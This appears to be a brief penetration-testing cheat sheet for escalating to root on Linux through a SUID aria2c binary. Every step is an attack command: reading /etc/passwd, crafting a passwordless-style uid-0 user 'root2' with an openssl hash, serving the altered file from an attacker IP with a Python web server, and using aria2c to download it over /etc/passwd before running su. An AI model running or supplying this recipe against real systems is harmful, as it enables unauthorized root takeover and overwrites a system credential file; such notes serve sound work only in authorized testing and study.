# aria2c SUID

## aria2c SUID

* on victim, cat /etc/passwd
  * also aria2c can be used if /etc/passwd is restricted ./aria2c -i /etc/passwd
* on attacker , nano newpasswd , paste all content of **/etc/passwd**
* on victim, Generate password hash openssl passwd evil123
* echo "root2:\<passwd-hash>:0:0:root:/root:/bin/bash" >> newpasswd
* python3 -m http.server 80
* on victim,
  * cd /etc
  * ./aria2c -o passwd "<http://192.168.45.5/newpasswd>" --allow-overwrite=true
  * su root2